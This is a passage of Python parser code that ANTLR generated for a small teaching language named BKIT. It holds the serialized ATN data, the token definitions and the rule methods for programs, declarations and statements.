buf.write(\"\\3\\2\\2\\2\\u0149\\u014c\\3\\2\\2\\2\\u014a\\u0148\\3\\2\\2\\2\\u014a\")\n buf.write(\"\\u014b\\3\\2\\2\\2\\u014b\\u014e\\3\\2\\2\\2\\u014c\\u014a\\3\\2\\2\\2\")\n buf.write(\"\\u014d\\u0145\\3\\2\\2\\2\\u014e\\u0151\\3\\2\\2\\2\\u014f\\u014d\\3\")\n buf.write(\"\\2\\2\\2\\u014f\\u0150\\3\\2\\2\\2\\u0150\\u0152\\3\\2\\2\\2\\u0151\\u014f\")\n buf.write(\"\\3\\2\\2\\2\\u0152\\u0153\\7\\65\\2\\2\\u0153\\67\\3\\2\\2\\2\\u0154\\u0155\")\n buf.write(\"\\7\\66\\2\\2\\u0155\\u0156\\5 \\21\\2\\u0156\\u0157\\7\\67\\2\\2\\u0157\")\n buf.write(\"\\u015e\\3\\2\\2\\2\\u0158\\u0159\\7\\66\\2\\2\\u0159\\u015a\\5 \\21\")\n buf.write(\"\\2\\u015a\\u015b\\7\\67\\2\\2\\u015b\\u015c\\58\\35\\2\\u015c\\u015e\")\n buf.write(\"\\3\\2\\2\\2\\u015d\\u0154\\3\\2\\2\\2\\u015d\\u0158\\3\\2\\2\\2\\u015e\")\n buf.write(\"9\\3\\2\\2\\2\\u015f\\u0160\\7\\3\\2\\2\\u0160\\u0161\\7>\\2\\2\\u0161\")\n buf.write(\"\\u0162\\5> \\2\\u0162;\\3\\2\\2\\2\\u0163\\u0164\\t\\7\\2\\2\\u0164\")\n buf.write(\"=\\3\\2\\2\\2\\u0165\\u0174\\78\\2\\2\\u0166\\u0169\\5<\\37\\2\\u0167\")\n buf.write(\"\\u0169\\5> \\2\\u0168\\u0166\\3\\2\\2\\2\\u0168\\u0167\\3\\2\\2\\2\\u0169\")\n buf.write(\"\\u0171\\3\\2\\2\\2\\u016a\\u016d\\7=\\2\\2\\u016b\\u016e\\5<\\37\\2\")\n buf.write(\"\\u016c\\u016e\\5> \\2\\u016d\\u016b\\3\\2\\2\\2\\u016d\\u016c\\3\\2\")\n buf.write(\"\\2\\2\\u016e\\u0170\\3\\2\\2\\2\\u016f\\u016a\\3\\2\\2\\2\\u0170\\u0173\")\n buf.write(\"\\3\\2\\2\\2\\u0171\\u016f\\3\\2\\2\\2\\u0171\\u0172\\3\\2\\2\\2\\u0172\")\n buf.write(\"\\u0175\\3\\2\\2\\2\\u0173\\u0171\\3\\2\\2\\2\\u0174\\u0168\\3\\2\\2\\2\")\n buf.write(\"\\u0174\\u0175\\3\\2\\2\\2\\u0175\\u0176\\3\\2\\2\\2\\u0176\\u0177\\7\")\n buf.write(\"9\\2\\2\\u0177?\\3\\2\\2\\2\\u0178\\u017b\\5D#\\2\\u0179\\u017b\\5B\")\n buf.write(\"\\\"\\2\\u017a\\u0178\\3\\2\\2\\2\\u017a\\u0179\\3\\2\\2\\2\\u017b\\u0183\")\n buf.write(\"\\3\\2\\2\\2\\u017c\\u017f\\7=\\2\\2\\u017d\\u0180\\5D#\\2\\u017e\\u0180\")\n buf.write(\"\\5B\\\"\\2\\u017f\\u017d\\3\\2\\2\\2\\u017f\\u017e\\3\\2\\2\\2\\u0180\")\n buf.write(\"\\u0182\\3\\2\\2\\2\\u0181\\u017c\\3\\2\\2\\2\\u0182\\u0185\\3\\2\\2\\2\")\n buf.write(\"\\u0183\\u0181\\3\\2\\2\\2\\u0183\\u0184\\3\\2\\2\\2\\u0184A\\3\\2\\2\")\n buf.write(\"\\2\\u0185\\u0183\\3\\2\\2\\2\\u0186\\u018a\\7\\3\\2\\2\\u0187\\u0188\")\n buf.write(\"\\7\\66\\2\\2\\u0188\\u0189\\7\\4\\2\\2\\u0189\\u018b\\7\\67\\2\\2\\u018a\")\n buf.write(\"\\u0187\\3\\2\\2\\2\\u018b\\u018c\\3\\2\\2\\2\\u018c\\u018a\\3\\2\\2\\2\")\n buf.write(\"\\u018c\\u018d\\3\\2\\2\\2\\u018d\\u0190\\3\\2\\2\\2\\u018e\\u0190\\7\")\n buf.write(\"\\3\\2\\2\\u018f\\u0186\\3\\2\\2\\2\\u018f\\u018e\\3\\2\\2\\2\\u0190\\u0191\")\n buf.write(\"\\3\\2\\2\\2\\u0191\\u0194\\7>\\2\\2\\u0192\\u0195\\5> \\2\\u0193\\u0195\")\n buf.write(\"\\5<\\37\\2\\u0194\\u0192\\3\\2\\2\\2\\u0194\\u0193\\3\\2\\2\\2\\u0195\")\n buf.write(\"C\\3\\2\\2\\2\\u0196\\u019a\\7\\3\\2\\2\\u0197\\u0198\\7\\66\\2\\2\\u0198\")\n buf.write(\"\\u0199\\7\\4\\2\\2\\u0199\\u019b\\7\\67\\2\\2\\u019a\\u0197\\3\\2\\2\")\n buf.write(\"\\2\\u019b\\u019c\\3\\2\\2\\2\\u019c\\u019a\\3\\2\\2\\2\\u019c\\u019d\")\n buf.write(\"\\3\\2\\2\\2\\u019d\\u01a0\\3\\2\\2\\2\\u019e\\u01a0\\7\\3\\2\\2\\u019f\")\n buf.write(\"\\u0196\\3\\2\\2\\2\\u019f\\u019e\\3\\2\\2\\2\\u01a0E\\3\\2\\2\\2\\u01a1\")\n buf.write(\"\\u01a6\\7\\3\\2\\2\\u01a2\\u01a3\\7\\66\\2\\2\\u01a3\\u01a4\\5 \\21\")\n buf.write(\"\\2\\u01a4\\u01a5\\7\\67\\2\\2\\u01a5\\u01a7\\3\\2\\2\\2\\u01a6\\u01a2\")\n buf.write(\"\\3\\2\\2\\2\\u01a7\\u01a8\\3\\2\\2\\2\\u01a8\\u01a6\\3\\2\\2\\2\\u01a8\")\n buf.write(\"\\u01a9\\3\\2\\2\\2\\u01a9G\\3\\2\\2\\2\\u01aa\\u01ab\\5F$\\2\\u01ab\")\n buf.write(\"\\u01ac\\7>\\2\\2\\u01ac\\u01ad\\5> \\2\\u01adI\\3\\2\\2\\2\\u01ae\\u01af\")\n buf.write(\"\\7\\3\\2\\2\\u01af\\u01b0\\7>\\2\\2\\u01b0\\u01b1\\5<\\37\\2\\u01b1\")\n buf.write(\"K\\3\\2\\2\\2\\u01b2\\u01b7\\5D#\\2\\u01b3\\u01b4\\7=\\2\\2\\u01b4\\u01b6\")\n buf.write(\"\\5D#\\2\\u01b5\\u01b3\\3\\2\\2\\2\\u01b6\\u01b9\\3\\2\\2\\2\\u01b7\\u01b5\")\n buf.write(\"\\3\\2\\2\\2\\u01b7\\u01b8\\3\\2\\2\\2\\u01b8M\\3\\2\\2\\2\\u01b9\\u01b7\")\n buf.write(\"\\3\\2\\2\\2,SYhqw\\u0082\\u0088\\u009e\\u00ab\\u00b0\\u00d6\\u00e6\")\n buf.write(\"\\u00eb\\u00f2\\u00f9\\u0103\\u010e\\u0119\\u011f\\u0124\\u0128\")\n buf.write(\"\\u0131\\u0135\\u013c\\u0141\\u014a\\u014f\\u015d\\u0168\\u016d\")\n buf.write(\"\\u0171\\u0174\\u017a\\u017f\\u0183\\u018c\\u018f\\u0194\\u019c\")\n buf.write(\"\\u019f\\u01a8\\u01b7\")\n return buf.getvalue()\n\n\nclass BKITParser ( Parser ):\n\n grammarFileName = \"BKIT.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"'Body'\", \"'Break'\", \"'Continue'\", \n \"'Do'\", \"'Else'\", \"'ElseIf'\", \"'EndIf'\", \"'EndBody'\", \n \"'EndFor'\", \"'EndWhile'\", \"'For'\", \"'Function'\", \"'If'\", \n \"'Parameter'\", \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \n \"'True'\", \"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \n \"'-.'\", \"'*'\", \"'*.'\", \"'\\\\'\", \"'\\\\.'\", \"'%'\", \"'!'\", \n \"'&&'\", \"'||'\", \"'=='\", \"'!='\", \"'<'\", \"'>'\", \"'<='\", \n \"'>='\", \"'=/='\", \"'<.'\", \"'>.'\", \"'<=.'\", \"'>=.'\", \n \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \"'}'\", \"':'\", \"'.'\", \n \"';'\", \"','\", \"'='\", \"'\\\"'\", \"'int_of_float'\", \"'int_of_string'\", \n \"'float_to_int'\", \"'float_of_string'\", \"'bool_of_string'\", \n \"'string_of_bool'\", \"'string_of_int'\", \"'string_of_float'\" ]\n\n symbolicNames = [ \"<INVALID>\", \"ID\", \"INT_LIT\", \"FLOAT_LIT\", \"BOOL_LIT\", \n \"STRING_LIT\", \"BODY\", \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \n \"ELSEIF\", \"ENDIF\", \"ENDBODY\", \"ENDFOR\", \"ENDWHILE\", \n \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \"RETURN\", \"THEN\", \n \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \"PLUS_INT\", \n \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \n \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \n \"AND\", \"OR\", \"EQUAL\", \"NOT_EQUAL_INT\", \"LESS_INT\", \n \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \"GREATER_OR_EQUAL_INT\", \n \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \n \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \n \"RIGHT_PAREN\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \n \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\", \n \"DOUBLE_QUOTE\", \"INT_OF_FLOAT\", \"INT_OF_STRING\", \"FLOAT_TO_INT\", \n \"FLOAT_OF_STRING\", \"BOOL_OF_STRING\", \"STRING_OF_BOOL\", \n \"STRING_OF_INT\", \"STRING_OF_FLOAT\", \"COMMENT\", \"WS\", \n \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\" ]\n\n RULE_program = 0\n RULE_var_declare = 1\n RULE_function_declare = 2\n RULE_stmt_list = 3\n RULE_stmt = 4\n RULE_if_stmt = 5\n RULE_var_declare_stmt = 6\n RULE_for_stmt = 7\n RULE_while_stmt = 8\n RULE_dowhile_stmt = 9\n RULE_assign_stmt = 10\n RULE_break_stmt = 11\n RULE_continue_stmt = 12\n RULE_call_stmt = 13\n RULE_return_stmt = 14\n RULE_expr = 15\n RULE_expr1 = 16\n RULE_expr2 = 17\n RULE_expr3 = 18\n RULE_expr4 = 19\n RULE_expr5 = 20\n RULE_expr6 = 21\n RULE_array_cell = 22\n RULE_expr7 = 23\n RULE_expr8 = 24\n RULE_operand = 25\n RULE_function_call = 26\n RULE_index_op = 27\n RULE_array = 28\n RULE_primitive_data = 29\n RULE_array_lit = 30\n RULE_var_list = 31\n RULE_var_init = 32\n RULE_var_non_init = 33\n RULE_composite_var = 34\n RULE_composite_init = 35\n RULE_primitive_init = 36\n RULE_params_list = 37\n\n ruleNames = [ \"program\", \"var_declare\", \"function_declare\", \"stmt_list\", \n \"stmt\", \"if_stmt\", \"var_declare_stmt\", \"for_stmt\", \"while_stmt\", \n \"dowhile_stmt\", \"assign_stmt\", \"break_stmt\", \"continue_stmt\", \n \"call_stmt\", \"return_stmt\", \"expr\", \"expr1\", \"expr2\", \n \"expr3\", \"expr4\", \"expr5\", \"expr6\", \"array_cell\", \"expr7\", \n \"expr8\", \"operand\", \"function_call\", \"index_op\", \"array\", \n \"primitive_data\", \"array_lit\", \"var_list\", \"var_init\", \n \"var_non_init\", \"composite_var\", \"composite_init\", \"primitive_init\", \n \"params_list\" ]\n\n EOF = Token.EOF\n ID=1\n INT_LIT=2\n FLOAT_LIT=3\n BOOL_LIT=4\n STRING_LIT=5\n BODY=6\n BREAK=7\n CONTINUE=8\n DO=9\n ELSE=10\n ELSEIF=11\n ENDIF=12\n ENDBODY=13\n ENDFOR=14\n ENDWHILE=15\n FOR=16\n FUNCTION=17\n IF=18\n PARAMETER=19\n RETURN=20\n THEN=21\n VAR=22\n WHILE=23\n TRUE=24\n FALSE=25\n ENDDO=26\n PLUS_INT=27\n PLUS_FLOAT=28\n MINUS_INT=29\n MINUS_FLOAT=30\n STAR_INT=31\n STAR_FLOAT=32\n DIV_INT=33\n DIV_FLOAT=34\n MOD=35\n NOT=36\n AND=37\n OR=38\n EQUAL=39\n NOT_EQUAL_INT=40\n LESS_INT=41\n GREATER_INT=42\n LESS_OR_EQUAL_INT=43\n GREATER_OR_EQUAL_INT=44\n NOT_EQUAL_FLOAT=45\n LESS_FLOAT=46\n GREATER_FLOAT=47\n LESS_OR_EQUAL_FLOAT=48\n GREATER_OR_EQUAL_FLOAT=49\n LEFT_PAREN=50\n RIGHT_PAREN=51\n LEFT_BRACKET=52\n RIGHT_BRACKET=53\n LEFT_BRACE=54\n RIGHT_BRACE=55\n COLON=56\n DOT=57\n SEMI=58\n COMMA=59\n ASSIGN=60\n DOUBLE_QUOTE=61\n INT_OF_FLOAT=62\n INT_OF_STRING=63\n FLOAT_TO_INT=64\n FLOAT_OF_STRING=65\n BOOL_OF_STRING=66\n STRING_OF_BOOL=67\n STRING_OF_INT=68\n STRING_OF_FLOAT=69\n COMMENT=70\n WS=71\n ILLEGAL_ESCAPE=72\n UNCLOSE_STRING=73\n UNTERMINATED_COMMENT=74\n ERROR_CHAR=75\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def EOF(self):\n return self.getToken(BKITParser.EOF, 0)\n\n def var_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declareContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def function_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Function_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Function_declareContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_program\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitProgram\" ):\n return visitor.visitProgram(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def program(self):\n\n localctx = BKITParser.ProgramContext(self, self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 81\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 76\n self.var_declare()\n self.state = 77\n self.match(BKITParser.SEMI)\n self.state = 83\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 87\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.FUNCTION:\n self.state = 84\n self.function_declare()\n self.state = 89\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 90\n self.match(BKITParser.EOF)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def VAR(self):\n return self.getToken(BKITParser.VAR, 0)\n\n def COLON(self):\n return self.getToken(BKITParser.COLON, 0)\n\n def var_list(self):\n return self.getTypedRuleContext(BKITParser.Var_listContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitVar_declare\" ):\n return visitor.visitVar_declare(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def var_declare(self):\n\n localctx = BKITParser.Var_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 2, self.RULE_var_declare)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 92\n self.match(BKITParser.VAR)\n self.state = 93\n self.match(BKITParser.COLON)\n self.state = 94\n self.var_list()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def FUNCTION(self):\n return self.getToken(BKITParser.FUNCTION, 0)\n\n def COLON(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COLON)\n else:\n return self.getToken(BKITParser.COLON, i)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def BODY(self):\n return self.getToken(BKITParser.BODY, 0)\n\n def ENDBODY(self):\n return self.getToken(BKITParser.ENDBODY, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def PARAMETER(self):\n return self.getToken(BKITParser.PARAMETER, 0)\n\n def params_list(self):\n return self.getTypedRuleContext(BKITParser.Params_listContext,0)\n\n\n def var_declare_stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declare_stmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declare_stmtContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.StmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.StmtContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_declare\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitFunction_declare\" ):\n return visitor.visitFunction_declare(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def function_declare(self):\n\n localctx = BKITParser.Function_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 4, self.RULE_function_declare)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 96\n self.match(BKITParser.FUNCTION)\n self.state = 97\n self.match(BKITParser.COLON)\n self.state = 98\n self.match(BKITParser.ID)\n self.state = 102\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if _la==BKITParser.PARAMETER:\n self.state = 99\n self.match(BKITParser.PARAMETER)\n self.state = 100\n self.match(BKITParser.COLON)\n self.state = 101\n self.params_list()\n\n\n self.state = 104\n self.match(BKITParser.BODY)\n self.state = 105\n self.match(BKITParser.COLON)\n self.state = 111\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 106\n self.var_declare_stmt()\n self.state = 107\n self.match(BKITParser.SEMI)\n self.state = 113\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 117\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.BREAK) | (1 << BKITParser.CONTINUE) | (1 << BKITParser.DO) | (1 << BKITParser.FOR) | (1 << BKITParser.IF) | (1 << BKITParser.RETURN) | (1 << BKITParser.WHILE) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 114\n self.stmt()\n self.state = 119\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 120\n self.match(BKITParser.ENDBODY)\n self.state = 121\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Stmt_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_declare_stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declare_stmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declare_stmtContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.StmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.StmtContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_stmt_list\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitStmt_list\" ):\n return visitor.visitStmt_list(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def stmt_list(self):\n\n localctx = BKITParser.Stmt_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 6, self.RULE_stmt_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 128\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 123\n self.var_declare_stmt()\n self.state = 124\n self.match(BKITParser.SEMI)\n self.state = 130\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 134\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,6,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n self.state = 131\n self.stmt() \n self.state = 136\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,6,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class StmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def if_stmt(self):\n return self.getTypedRuleContext(BKITParser.If_stmtContext,0)\n\n\n def for_stmt(self):\n return self.getTypedRuleContext(BKITParser.For_stmtContext,0)\n\n\n def while_stmt(self):\n return self.getTypedRuleContext(BKITParser.While_stmtContext,0)\n\n\n def dowhile_stmt(self):\n return self.getTypedRuleContext(BKITParser.Dowhile_stmtContext,0)\n\n\n def assign_stmt(self):\n return self.getTypedRuleContext(BKITParser.Assign_stmtContext,0)\n\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def break_stmt(self):\n return self.getTypedRuleContext(BKITParser.Break_stmtContext,0)\n\n\n def continue_stmt(self):\n return self.getTypedRuleContext(BKITParser.Continue_stmtContext,0)\n\n\n def call_stmt(self):\n return self.getTypedRuleContext(BKITParser.Call_stmtContext,0)\n\n\n def return_stmt(self):\n return self.getTypedRuleContext(BKITParser.Return_stmtContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitStmt\" ):\n return visitor.visitStmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def stmt(self):\n\n localctx = BKITParser.StmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 8, self.RULE_stmt)\n try:\n self.state = 156\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,7,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 137\n self.if_stmt()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 138\n self.for_stmt()\n pass\n\n elif la_ == 3:\n self.enterOuterAlt(localctx, 3)\n self.state = 139\n self.while_stmt()\n pass\n\n elif la_ == 4:\n self.enterOuterAlt(localctx, 4)\n self.state = 140\n self.dowhile_stmt()\n pass\n\n elif la_ == 5:\n self.enterOuterAlt(localctx, 5)\n self.state = 141\n self.assign_stmt()\n self.state = 142\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 6:\n self.enterOuterAlt(localctx, 6)\n self.state = 144\n self.break_stmt()\n self.state = 145\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 7:\n self.enterOuterAlt(localctx, 7)\n self.state = 147\n self.continue_stmt()\n self.state = 148\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 8:\n self.enterOuterAlt(localctx, 8)\n self.state = 150\n self.call_stmt()\n self.state = 151\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 9:\n self.enterOuterAlt(localctx, 9)\n self.state = 153\n self.return_stmt()\n self.state = 154\n self.match(BKITParser.SEMI)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class If_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def IF(self):\n return self.getToken(BKITParser.IF, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def THEN(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.THEN)\n else:\n return self.getToken(BKITParser.THEN, i)\n\n def stmt_list(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Stmt_listContext)\n else:\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,i)\n\n\n def ENDIF(self):\n return self.getToken(BKITParser.ENDIF, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def ELSEIF(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.ELSEIF)\n else:\n return self.getToken(BKITParser.ELSEIF, i)\n\n def ELSE(self):\n return self.getToken(BKITParser.ELSE, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_if_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitIf_stmt\" ):\n return visitor.visitIf_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def if_stmt(self):\n\n localctx = BKITParser.If_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 10, self.RULE_if_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 158\n self.match(BKITParser.IF)\n self.state = 159\n self.expr()\n self.state = 160\n self.match(BKITParser.THEN)\n self.state = 161\n self.stmt_list()\n self.state = 169\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.ELSEIF:\n self.state = 162\n self.match(BKITParser.ELSEIF)\n self.state = 163\n self.expr()\n self.state = 164\n self.match(BKITParser.THEN)\n self.state = 165\n self.stmt_list()\n self.state = 171\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 174\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if _la==BKITParser.ELSE:\n self.state = 172\n self.match(BKITParser.ELSE)\n self.state = 173\n self.stmt_list()\n\n\n self.state = 176\n self.match(BKITParser.ENDIF)\n self.state = 177\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declare_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_declare(self):\n return self.getTypedRuleContext(BKITParser.Var_declareContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitVar_declare_stmt\" ):\n return visitor.visitVar_declare_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def var_declare_stmt(self):\n\n localctx = BKITParser.Var_declare_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 12, self.RULE_var_declare_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 179\n self.var_declare()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class For_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def FOR(self):\n return self.getToken(BKITParser.FOR, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def RIGHT_PAREN(self):\n return 